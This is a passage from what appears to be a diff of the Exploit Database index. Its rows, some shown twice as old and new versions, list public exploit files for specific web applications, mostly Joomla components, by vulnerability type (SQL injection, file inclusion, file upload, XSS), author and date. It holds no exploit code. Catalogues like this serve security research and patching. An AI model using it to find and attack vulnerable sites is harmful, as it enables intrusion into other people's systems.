12158,platforms/php/webapps/12158.py,"Elite Gaming Ladders 3.5 - (match) SQL Injection",2010-04-11,"Easy Laster",php,webapps,0
12159,platforms/php/webapps/12159.txt,"Joomla! Component 'com_mv_restaurantmenumanager' 1.5.2 - SQL Injection",2010-04-11,Valentin,php,webapps,0
12159,platforms/php/webapps/12159.txt,"Joomla! Component Multi-Venue Restaurant Menu Manager 1.5.2 - SQL Injection",2010-04-11,Valentin,php,webapps,0
12160,platforms/php/webapps/12160.txt,"HotNews 0.7.2 - Remote File Inclusion",2010-04-11,team_elite,php,webapps,0
12162,platforms/php/webapps/12162.txt,"Joomla! Component 'mv_restaurantmenumanager' - SQL Injection",2010-04-11,Sudden_death,php,webapps,0
12163,platforms/php/webapps/12163.txt,"Worldviewer.com CMS - SQL Injection",2010-04-12,"41.w4r10r aka AN1L",php,webapps,0
12164,platforms/php/webapps/12164.txt,"YaPiG 0.94.0u - Remote File Inclusion",2010-04-12,JIKO,php,webapps,0
12166,platforms/php/webapps/12166.txt,"Joomla! Component 'com_webtv' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12167,platforms/php/webapps/12167.txt,"Joomla! Component 'com_horoscope' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12167,platforms/php/webapps/12167.txt,"Joomla! Component Horoscope 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12168,platforms/php/webapps/12168.txt,"Joomla! Component Arcade Games 1.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12169,platforms/php/webapps/12169.txt,"Joomla! Component 'com_Flashgames' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12170,platforms/php/webapps/12170.txt,"Joomla! Component Address Book 1.5.0 - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
@ -22866,7 +22871,7 @@ id,file,description,date,author,platform,type,port
12174,platforms/php/webapps/12174.txt,"Joomla! Component 'com_onlineexam' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12175,platforms/php/webapps/12175.txt,"Joomla! Component 'com_joommail' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12176,platforms/php/webapps/12176.txt,"Joomla! Component 'com_memory' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12177,platforms/php/webapps/12177.txt,"Joomla! Component 'com_market' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12177,platforms/php/webapps/12177.txt,"Joomla! Component Online Market 2.x - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12178,platforms/php/webapps/12178.txt,"Joomla! Component 'com_diary' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
12179,platforms/php/webapps/12179.txt,"FusionForge 5.0 - Multiple Remote File Inclusion",2010-04-12,cr4wl3r,php,webapps,0
12180,platforms/php/webapps/12180.txt,"Joomla! Component 'com_worldrates' - Local File Inclusion",2010-04-12,AntiSecurity,php,webapps,0
@ -22876,8 +22881,8 @@ id,file,description,date,author,platform,type,port
12184,platforms/php/webapps/12184.txt,"Joomla! Component 'com_sermonspeaker' - SQL Injection",2010-04-12,SadHaCkEr,php,webapps,0
12185,platforms/php/webapps/12185.txt,"Joomla! Component 'com_flexicontent' - Local File",2010-04-12,eidelweiss,php,webapps,0
12187,platforms/php/webapps/12187.txt,"Vieassociative Openmairie 1.01 Beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-12,cr4wl3r,php,webapps,0
12190,platforms/php/webapps/12190.txt,"Joomla! Component 'com_jvehicles' - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
12191,platforms/php/webapps/12191.txt,"Joomla! Component 'com_jp_jobs' 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0
12190,platforms/php/webapps/12190.txt,"Joomla! Component Jvehicles 1.0/2.0 - 'aid' Parameter SQL Injection",2010-04-13,"Don Tukulesto",php,webapps,0
12191,platforms/php/webapps/12191.txt,"Joomla! Component JP Jobs 1.2.0 - 'id' Parameter SQL Injection",2010-04-13,v3n0m,php,webapps,0
12192,platforms/php/webapps/12192.txt,"Blog System 1.5 - Multiple Vulnerabilities",2010-04-13,cp77fk4r,php,webapps,0
12193,platforms/php/webapps/12193.txt,"Openurgence vaccin 1.03 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,cr4wl3r,php,webapps,0
12194,platforms/php/webapps/12194.txt,"Police Municipale Open Main Courante 1.01beta - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-13,cr4wl3r,php,webapps,0
@ -22899,17 +22904,17 @@ id,file,description,date,author,platform,type,port
12230,platforms/php/webapps/12230.txt,"Joomla! Component 'com_wgpicasa' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12231,platforms/php/webapps/12231.txt,"Joomla! Component 'com_s5clanroster' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12232,platforms/php/webapps/12232.txt,"Joomla! Component 'com_photobattle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12233,platforms/php/webapps/12233.txt,"Joomla! Component 'com_mtfireeagle' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12234,platforms/php/webapps/12234.txt,"Joomla! Component 'com_mediamall' - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
12235,platforms/php/webapps/12235.txt,"Joomla! Component 'com_lovefactory' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12236,platforms/php/webapps/12236.txt,"Joomla! Component 'com_jacomment' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12233,platforms/php/webapps/12233.txt,"Joomla! Component MT Fire Eagle 1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12234,platforms/php/webapps/12234.txt,"Joomla! Component Media Mall Factory 1.0.4 - Blind SQL Injection",2010-04-14,AntiSecurity,php,webapps,0
12235,platforms/php/webapps/12235.txt,"Joomla! Component Love Factory 1.3.4 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12236,platforms/php/webapps/12236.txt,"Joomla! Component JA Comment - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12237,platforms/php/webapps/12237.txt,"Joomla! Component 'com_delicious' - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12238,platforms/php/webapps/12238.txt,"Joomla! Component Deluxe Blog Factory 1.1.2 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12239,platforms/php/webapps/12239.txt,"Joomla! Component BeeHeard 1.0 - Local File Inclusion",2010-04-14,AntiSecurity,php,webapps,0
12241,platforms/php/webapps/12241.txt,"Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities",2010-04-14,eidelweiss,php,webapps,0
12242,platforms/jsp/webapps/12242.txt,"RJ-iTop Network Vulnerability Scanner System - Multiple SQL Injections",2010-04-14,wsn1983,jsp,webapps,0
12245,platforms/php/webapps/12245.txt,"Softbiz B2B trading Marketplace Script - buyers_subcategories SQL Injection",2010-04-15,"AnGrY BoY",php,webapps,0
12246,platforms/php/webapps/12246.txt,"Joomla! Component 'com_iproperty' 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0
12246,platforms/php/webapps/12246.txt,"Joomla! Component Intellectual Property 1.5.3 - 'id' Parameter SQL Injection",2010-04-15,v3n0m,php,webapps,0
12249,platforms/php/webapps/12249.txt,"60cycleCMS 2.5.2 - (DOCUMENT_ROOT) Multiple Local File Inclusion",2010-04-15,eidelweiss,php,webapps,0
12251,platforms/php/webapps/12251.php,"Camiro-CMS_beta-0.1 - 'FCKeditor' Arbitrary File Upload",2010-04-15,eidelweiss,php,webapps,0
12254,platforms/php/webapps/12254.txt,"FCKEditor Core - (FileManager test.html) Arbitrary File Upload (1)",2010-04-16,Mr.MLL,php,webapps,0
@ -22920,7 +22925,7 @@ id,file,description,date,author,platform,type,port
12266,platforms/php/webapps/12266.txt,"60 cycleCMS 2.5.2 - Cross-Site Request Forgery (Change 'Username' and Password)",2010-04-16,EL-KAHINA,php,webapps,0
12267,platforms/php/webapps/12267.txt,"WebAdmin - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12268,platforms/php/webapps/12268.txt,"Uploader 0.7 - Arbitrary File Upload",2010-04-16,DigitALL,php,webapps,0
12269,platforms/php/webapps/12269.txt,"Joomla! Component 'com_joltcard' - SQL Injection",2010-04-16,Valentin,php,webapps,0
12269,platforms/php/webapps/12269.txt,"Joomla! Component JoltCard 1.2.1 - SQL Injection",2010-04-16,Valentin,php,webapps,0
12270,platforms/php/webapps/12270.txt,"Joomla! Component 'com_pandafminigames' - SQL Injection",2010-04-16,Valentin,php,webapps,0
12272,platforms/php/webapps/12272.txt,"PHP RapidKill Pro 5.x - Arbitrary File Upload",2010-04-17,DigitALL,php,webapps,0
12276,platforms/php/webapps/12276.txt,"Redaxo 4.2.1 - Remote File Inclusion",2010-04-18,eidelweiss,php,webapps,0
@ -22931,26 +22936,26 @@ id,file,description,date,author,platform,type,port
12282,platforms/php/webapps/12282.txt,"Joomla! Component Archery Scores 1.0.6 - Local File Inclusion",2010-04-18,"wishnusakti + inc0mp13te",php,webapps,0
12283,platforms/php/webapps/12283.txt,"Joomla! Component 'com_zimbcomment' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12284,platforms/php/webapps/12284.txt,"Joomla! Component 'com_zimbcore' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12285,platforms/php/webapps/12285.txt,"Joomla! Component 'com_gadgetfactory' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12286,platforms/php/webapps/12286.txt,"Joomla! Component 'com_matamko' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12287,platforms/php/webapps/12287.txt,"Joomla! Component 'com_multiroot' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12288,platforms/php/webapps/12288.txt,"Joomla! Component 'com_multimap' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12289,platforms/php/webapps/12289.txt,"Joomla! Component 'com_drawroot' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12285,platforms/php/webapps/12285.txt,"Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12286,platforms/php/webapps/12286.txt,"Joomla! Component Matamko 1.01 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12287,platforms/php/webapps/12287.txt,"Joomla! Component iNetLanka Multiple root 1.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12288,platforms/php/webapps/12288.txt,"Joomla! Component iNetLanka Multiple Map 1.0 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12289,platforms/php/webapps/12289.txt,"Joomla! Component iNetLanka Contact Us Draw Root Map 1.1 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12290,platforms/php/webapps/12290.txt,"Joomla! Component 'com_google' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12291,platforms/php/webapps/12291.txt,"Joomla! Component 'com_if_surfalert' - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12291,platforms/php/webapps/12291.txt,"Joomla! Component iF surfALERT 1.2 - Local File Inclusion",2010-04-18,AntiSecurity,php,webapps,0
12292,platforms/php/webapps/12292.txt,"Flex File Manager - Arbitrary File Upload",2010-04-19,Mr.MLL,php,webapps,0
12295,platforms/php/webapps/12295.txt,"N/X Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities",2010-04-19,eidelweiss,php,webapps,0
12296,platforms/php/webapps/12296.txt,"Openreglement 1.04 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-19,cr4wl3r,php,webapps,0
12299,platforms/php/webapps/12299.txt,"Joomla! Component 'com_gbufacebook' 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0
12299,platforms/php/webapps/12299.txt,"Joomla! Component GBU Facebook 1.0.5 - SQL Injection",2010-04-19,kaMtiEz,php,webapps,0
12301,platforms/php/webapps/12301.txt,"CMS Ariadna 2009 - SQL Injection",2010-04-19,"Andrés Gómez",php,webapps,0
12303,platforms/php/webapps/12303.pl,"MusicBox 3.3 - SQL Injection",2010-04-20,Ctacok,php,webapps,0
12305,platforms/php/webapps/12305.txt,"Joomla! Component 'com_jnewspaper' - 'cid' Parameter SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0
12306,platforms/php/webapps/12306.txt,"Joomla! Component 'com_jtm' 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0
12305,platforms/php/webapps/12305.txt,"Joomla! Component Online News Paper Manager 1.0 - 'cid' Parameter SQL Injection",2010-04-20,"Don Tukulesto",php,webapps,0
12306,platforms/php/webapps/12306.txt,"Joomla! Component JTM Reseller 1.9 Beta - SQL Injection",2010-04-20,kaMtiEz,php,webapps,0
12313,platforms/php/webapps/12313.txt,"Openregistrecil 1.02 - (Remote File Inclusion / Local File Inclusion) Multiple File Inclusion",2010-04-20,cr4wl3r,php,webapps,0
12315,platforms/php/webapps/12315.txt,"v2marketplacescript Upload_images Script (-7777) - Arbitrary File Upload",2010-04-21,cyberlog,php,webapps,0
12316,platforms/php/webapps/12316.txt,"Joomla! Component 'com_wmi' - Local File Inclusion",2010-04-21,"wishnusakti + inc0mp13te",php,webapps,0
12317,platforms/php/webapps/12317.txt,"Joomla! Component 'com_orgchart' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
12318,platforms/php/webapps/12318.txt,"Joomla! Component 'com_mmsblog' - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
12318,platforms/php/webapps/12318.txt,"Joomla! Component MMS Blog 2.3.0 - Local File Inclusion",2010-04-21,AntiSecurity,php,webapps,0
12319,platforms/php/webapps/12319.txt,"e107 CMS 0.7.19 - Cross-Site Request Forgery",2010-04-21,"High-Tech Bridge SA",php,webapps,0
12322,platforms/php/webapps/12322.txt,"LightNEasy 3.1.x - Multiple Vulnerabilities",2010-04-21,ITSecTeam,php,webapps,0
12323,platforms/php/webapps/12323.txt,"wb news (webmobo) 2.3.3 - Persistent Cross-Site Scripting",2010-04-21,ITSecTeam,php,webapps,0
@ -23010,10 +23015,10 @@ id,file,description,date,author,platform,type,port
12423,platforms/php/webapps/12423.txt,"CLScript.com Classifieds Software - SQL Injection",2010-04-27,41.w4r10,php,webapps,0
12424,platforms/asp/webapps/12424.txt,"Acart 2.0 Shopping Cart - Software Backup Dump",2010-04-27,indoushka,asp,webapps,0
12426,platforms/php/webapps/12426.txt,"Joomla! Component 'com_ultimateportfolio' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12427,platforms/php/webapps/12427.txt,"Joomla! Component 'com_noticeboard' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12427,platforms/php/webapps/12427.txt,"Joomla! Component NoticeBoard 1.3 - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12428,platforms/php/webapps/12428.txt,"Joomla! Component 'com_smartsite' - Local File Inclusion",2010-04-27,AntiSecurity,php,webapps,0
12429,platforms/php/webapps/12429.pl,"Joomla! Component ABC 1.1.7 - SQL Injection",2010-04-27,AntiSecurity,php,webapps,0
12430,platforms/php/webapps/12430.txt,"Joomla! Component 'com_graphics' 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
12430,platforms/php/webapps/12430.txt,"Joomla! Component Graphics 1.0.6 - Local File Inclusion",2010-04-27,"wishnusakti + inc0mp13te",php,webapps,0
12432,platforms/php/webapps/12432.txt,"Joomla! Component 'com_jesectionfinder' - Arbitrary File Upload",2010-04-28,Sid3^effects,php,webapps,0
12433,platforms/cgi/webapps/12433.py,"NIBE heat pump - Remote Code Execution",2010-04-28,"Jelmer de Hen",cgi,webapps,0
12434,platforms/cgi/webapps/12434.py,"NIBE heat pump - Local File Inclusion",2010-04-28,"Jelmer de Hen",cgi,webapps,0
@ -23045,7 +23050,7 @@ id,file,description,date,author,platform,type,port
12462,platforms/php/webapps/12462.txt,"AutoDealer 1.0 / 2.0 - MSSQL Injection",2010-04-30,Sid3^effects,php,webapps,0
12463,platforms/php/webapps/12463.txt,"New-CMS - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",php,webapps,0
12464,platforms/asp/webapps/12464.txt,"ASPCode CMS 1.5.8 - Multiple Vulnerabilities",2010-04-30,"Dr. Alberto Fontanella",asp,webapps,0
12465,platforms/php/webapps/12465.txt,"Joomla! Component 'com_newsfeeds' - SQL Injection",2010-04-30,Archimonde,php,webapps,0
12465,platforms/php/webapps/12465.txt,"Joomla! Component Newsfeeds - SQL Injection",2010-04-30,Archimonde,php,webapps,0
12466,platforms/php/webapps/12466.txt,"Puntal 2.1.0 - Remote File Inclusion",2010-04-30,eidelweiss,php,webapps,0
12467,platforms/php/webapps/12467.txt,"Webthaiapp - detail.php (cat) Blind SQL Injection",2010-04-30,Xelenonz,php,webapps,0
12468,platforms/php/webapps/12468.txt,"Alibaba Clone Platinum - 'offers_buy.php' SQL Injection",2010-04-30,v3n0m,php,webapps,0
@ -23119,24 +23124,24 @@ id,file,description,date,author,platform,type,port
12584,platforms/php/webapps/12584.txt,"PolyPager 1.0rc10 - 'FCKeditor' Arbitrary File Upload",2010-05-12,eidelweiss,php,webapps,0
12585,platforms/php/webapps/12585.txt,"4Images 1.7.7 - 'image_utils.php' Remote Command Execution",2010-05-12,"Sn!pEr.S!Te Hacker",php,webapps,0
12586,platforms/php/webapps/12586.php,"IPB 3.0.1 - SQL Injection",2010-05-13,Cryptovirus,php,webapps,0
12590,platforms/php/webapps/12590.txt,"Joomla! Component 'com_konsultasi' - 'sid' Parameter SQL Injection",2010-05-13,c4uR,php,webapps,0
12590,platforms/php/webapps/12590.txt,"Joomla! Component Komento 1.0.0 - 'sid' Parameter SQL Injection",2010-05-13,c4uR,php,webapps,0
12591,platforms/php/webapps/12591.txt,"BlaB! Lite 0.5 - Remote File Inclusion",2010-05-13,"Sn!pEr.S!Te Hacker",php,webapps,0
12592,platforms/php/webapps/12592.txt,"Joomla! Component 'com_aardvertiser' 2.0 - Local File Inclusion",2010-05-13,eidelweiss,php,webapps,0
12593,platforms/php/webapps/12593.txt,"damianov.net Shoutbox - Cross-Site Scripting",2010-05-13,"Valentin Hoebel",php,webapps,0
12594,platforms/php/webapps/12594.txt,"Joomla! Component 'com_sebercart' - 'getPic.php' Local File Disclosure",2010-05-13,AntiSecurity,php,webapps,0
12595,platforms/php/webapps/12595.txt,"Joomla! Component 'com_dioneformwizard' - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0
12595,platforms/php/webapps/12595.txt,"Joomla! Component FDione Form Wizard 1.0.2 - Local File Inclusion",2010-05-13,"Chip d3 bi0s",php,webapps,0
12596,platforms/php/webapps/12596.txt,"Link Bid Script - 'links.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
12597,platforms/php/webapps/12597.txt,"Press Release Script - 'page.php id' SQL Injection",2010-05-14,R3d-D3V!L,php,webapps,0
12598,platforms/php/webapps/12598.txt,"JE Ajax Event Calendar - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
12599,platforms/php/webapps/12599.txt,"Heaven Soft CMS 4.7 - SQL Injection",2010-05-14,PrinceofHacking,php,webapps,0
14364,platforms/php/webapps/14364.html,"eXtreme Message Board 1.9.11 - Multiple Cross-Site Request Forgery Vulnerabilities",2010-07-15,10n1z3d,php,webapps,0
12601,platforms/php/webapps/12601.txt,"Joomla! Component 'com_jejob' 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
12601,platforms/php/webapps/12601.txt,"Joomla! Component JE Job 1.0 - Local File Inclusion",2010-05-14,Valentin,php,webapps,0
12606,platforms/asp/webapps/12606.txt,"SelfComposer CMS - SQL Injection",2010-05-14,Locu,asp,webapps,0
12607,platforms/php/webapps/12607.txt,"Joomla! Component 'com_jequoteform' - Local File Inclusion",2010-05-14,ALTBTA,php,webapps,0
12607,platforms/php/webapps/12607.txt,"Joomla! Component JE Quotation Form 1.0b1 - Local File Inclusion",2010-05-14,ALTBTA,php,webapps,0
12608,platforms/php/webapps/12608.txt,"Heaven Soft CMS 4.7 - (photogallery_open.php) SQL Injection",2010-05-14,CoBRa_21,php,webapps,0
12609,platforms/php/webapps/12609.txt,"Alibaba Clone Platinum - 'buyer/index.php' SQL Injection",2010-05-14,GuN,php,webapps,0
12610,platforms/multiple/webapps/12610.txt,"VMware View Portal 3.1 - Cross-Site Scripting",2010-05-14,"Alexey Sintsov",multiple,webapps,0
12611,platforms/php/webapps/12611.txt,"Joomla! Component 'com_mscomment' 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
12611,platforms/php/webapps/12611.txt,"Joomla! Component MS Comment 0.8.0b - Local File Inclusion",2010-05-15,Xr0b0t,php,webapps,0
12612,platforms/php/webapps/12612.txt,"Alibaba Clone Platinum - 'about_us.php' SQL Injection",2010-05-15,CoBRa_21,php,webapps,0
12613,platforms/php/webapps/12613.txt,"CompactCMS 1.4.0 - (tiny_mce) Arbitrary File Upload",2010-05-15,ITSecTeam,php,webapps,0
12615,platforms/php/webapps/12615.txt,"Joomla! Component 'com_camp' - SQL Injection",2010-05-15,"Kernel Security Group",php,webapps,0
@ -23191,7 +23196,7 @@ id,file,description,date,author,platform,type,port
12684,platforms/php/webapps/12684.txt,"ConPresso 4.0.7 - SQL Injection",2010-05-21,Gamoscu,php,webapps,0
12686,platforms/php/webapps/12686.txt,"Online University - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0
12688,platforms/php/webapps/12688.txt,"JV2 Folder Gallery 3.1 - 'gallery.php' Remote File Inclusion",2010-05-21,"Sn!pEr.S!Te Hacker",php,webapps,0
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
12689,platforms/multiple/webapps/12689.txt,"Apache Axis2 Administration Console - Authenticated Cross-Site Scripting",2010-05-21,"Richard Brain",multiple,webapps,0
12690,platforms/php/webapps/12690.php,"cardinalCMS 1.2 - 'FCKeditor' Arbitrary File Upload",2010-05-21,Ma3sTr0-Dz,php,webapps,0
12691,platforms/php/webapps/12691.txt,"Online Job Board - (Authentication Bypass) SQL Injection",2010-05-21,cr4wl3r,php,webapps,0
14322,platforms/php/webapps/14322.txt,"Edgephp ClickBank Affiliate Marketplace Script - Multiple Vulnerabilities",2010-07-10,"L0rd CrusAd3r",php,webapps,0
@ -23256,10 +23261,10 @@ id,file,description,date,author,platform,type,port
12773,platforms/php/webapps/12773.txt,"Realtor Real Estate Agent - (idproperty) SQL Injection",2010-05-28,v3n0m,php,webapps,0
12776,platforms/php/webapps/12776.txt,"Realtor WebSite System E-Commerce - idfestival SQL Injection",2010-05-28,CoBRa_21,php,webapps,0
12777,platforms/php/webapps/12777.txt,"Realtor Real Estate Agent - 'news.php' SQL Injection",2010-05-28,v3n0m,php,webapps,0
12779,platforms/php/webapps/12779.txt,"Joomla! Component 'com_mycar' - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
12779,platforms/php/webapps/12779.txt,"Joomla! Component My Car 1.0 - Multiple Vulnerabilities",2010-05-28,Valentin,php,webapps,0
12780,platforms/php/webapps/12780.txt,"Joomla! Component BF Quiz 1.3.0 - SQL Injection (1)",2010-05-28,Valentin,php,webapps,0
12781,platforms/php/webapps/12781.txt,"Joomla! Component 'com_jepoll' - 'pollid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12782,platforms/php/webapps/12782.txt,"Joomla! Component 'com_jejob' 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12782,platforms/php/webapps/12782.txt,"Joomla! Component JE Job 1.0 - 'catid' Parameter SQL Injection",2010-05-28,v3n0m,php,webapps,0
12785,platforms/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,php,webapps,0
12786,platforms/windows/webapps/12786.txt,"fusebox (ProductList.cfm?CatDisplay) - SQL Injection",2010-05-29,Shamus,windows,webapps,0
12787,platforms/php/webapps/12787.txt,"Nucleus Plugin Gallery - Remote File Inclusion / SQL Injection",2010-05-29,AntiSecurity,php,webapps,0
@ -23286,7 +23291,7 @@ id,file,description,date,author,platform,type,port
12818,platforms/php/webapps/12818.txt,"e107 0.7.21 full - Remote File Inclusion / Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
12819,platforms/php/webapps/12819.txt,"Persian E107 - Cross-Site Scripting",2010-05-31,indoushka,php,webapps,0
12820,platforms/php/webapps/12820.txt,"Visitor Logger - 'banned.php' Remote File Inclusion",2010-05-31,bd0rk,php,webapps,0
12822,platforms/php/webapps/12822.txt,"Joomla! Component 'com_jsjobs' - SQL Injection",2010-05-31,d0lc3,php,webapps,0
12822,platforms/php/webapps/12822.txt,"Joomla! Component JS Jobs 1.0.5.8 - SQL Injection",2010-05-31,d0lc3,php,webapps,0
12823,platforms/php/webapps/12823.txt,"MusicBox - SQL Injection",2010-05-31,titanichacker,php,webapps,0
12833,platforms/asp/webapps/12833.txt,"Patient folder (THEME ASP) - SQL Injection",2010-05-31,"SA H4x0r",asp,webapps,0
12839,platforms/php/webapps/12839.txt,"Hexjector 1.0.7.2 - Persistent Cross-Site Scripting",2010-06-01,hexon,php,webapps,0
@ -23312,7 +23317,7 @@ id,file,description,date,author,platform,type,port
18594,platforms/php/webapps/18594.txt,"Simple Posting System - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0
14247,platforms/php/webapps/14247.txt,"Auction_Software Script - Admin Login Bypass",2010-07-06,ALTBTA,php,webapps,0
13736,platforms/php/webapps/13736.txt,"DDLCMS 2.1 - (skin) Remote File Inclusion",2010-06-06,eidelweiss,php,webapps,0
13737,platforms/php/webapps/13737.txt,"Joomla! Component 'com_djartgallery' - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
13737,platforms/php/webapps/13737.txt,"Joomla! Component DJ-ArtGallery 0.9.1 - Multiple Vulnerabilities",2010-06-06,d0lc3,php,webapps,0
13738,platforms/php/webapps/13738.txt,"PHP Director 0.2 - SQL Injection",2010-06-06,Mr.Rat,php,webapps,0
13739,platforms/php/webapps/13739.txt,"WmsCMS - Cross-Site Scripting / SQL Injection",2010-06-06,Ariko-Security,php,webapps,0
13740,platforms/php/webapps/13740.txt,"iScripts eSwap 2.0 - SQL Injection / Cross-Site Scripting",2010-06-06,Sid3^effects,php,webapps,0
@ -23556,7 +23561,7 @@ id,file,description,date,author,platform,type,port
14123,platforms/php/webapps/14123.txt,"WebDM CMS - SQL Injection",2010-06-29,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
14124,platforms/php/webapps/14124.pl,"PHP-Nuke 8.0 - SQL Injection",2010-06-30,Dante90,php,webapps,0
14125,platforms/php/webapps/14125.pl,"ShopCartDx 4.30 - 'products.php' Blind SQL Injection",2010-06-30,Dante90,php,webapps,0
14126,platforms/php/webapps/14126.txt,"Joomla! Component 'com_gamesbox' 1.0.2 - 'id' SQL Injection",2010-06-30,v3n0m,php,webapps,0
14126,platforms/php/webapps/14126.txt,"Joomla! Component Gamesbox 1.0.2 - 'id' Parameter SQL Injection",2010-06-30,v3n0m,php,webapps,0
14127,platforms/php/webapps/14127.txt,"Joomla! Component 'Joomanager' - SQL Injection",2010-06-30,Sid3^effects,php,webapps,0
14141,platforms/php/webapps/14141.pl,"Oxygen2PHP 1.1.3 - 'member.php' SQL Injection",2010-06-30,Dante90,php,webapps,0
14132,platforms/php/webapps/14132.html,"webERP 3.11.4 - Multiple Vulnerabilities",2010-06-30,"ADEO Security",php,webapps,0
@ -23587,7 +23592,7 @@ id,file,description,date,author,platform,type,port
14192,platforms/asp/webapps/14192.txt,"Ziggurat Farsi CMS - SQL Injection",2010-07-03,"Arash Saadatfar",asp,webapps,0
14184,platforms/php/webapps/14184.txt,"SweetRice < 0.6.4 - 'FCKeditor' Arbitrary File Upload",2010-07-03,ITSecTeam,php,webapps,0
14186,platforms/php/webapps/14186.txt,"Family Connections Who is Chatting AddOn - Remote File Inclusion",2010-07-03,lumut--,php,webapps,0
14187,platforms/php/webapps/14187.txt,"Joomla! Component 'com_eventcal' 1.6.4 - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
14187,platforms/php/webapps/14187.txt,"Joomla! Component eventCal 1.6.4 - Blind SQL Injection",2010-07-03,RoAd_KiLlEr,php,webapps,0
14188,platforms/php/webapps/14188.html,"Cpanel 11.25 - Cross-Site Request Forgery (Add FTP Account)",2010-07-03,G0D-F4Th3r,php,webapps,0
14193,platforms/php/webapps/14193.c,"iscripts Socialware 2.2.x - Multiple Vulnerabilities",2010-07-03,"Salvatore Fresta",php,webapps,0
14208,platforms/php/webapps/14208.txt,"Sandbox 2.0.2 - Local File Inclusion",2010-07-04,saudi0hacker,php,webapps,0
@ -23603,11 +23608,11 @@ id,file,description,date,author,platform,type,port
14206,platforms/php/webapps/14206.txt,"Esoftpro Online Contact Manager - Multiple Vulnerabilities",2010-07-04,"L0rd CrusAd3r",php,webapps,0
14207,platforms/php/webapps/14207.txt,"Joomla! Component 'com_phocagallery' - SQL Injection",2010-07-04,RoAd_KiLlEr,php,webapps,0
14210,platforms/php/webapps/14210.txt,"Joomla! Component Address Book - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
14211,platforms/php/webapps/14211.txt,"Joomla! Component 'com_ninjamonials' - Blind SQL Injection",2010-07-04,Sid3^effects,php,webapps,0
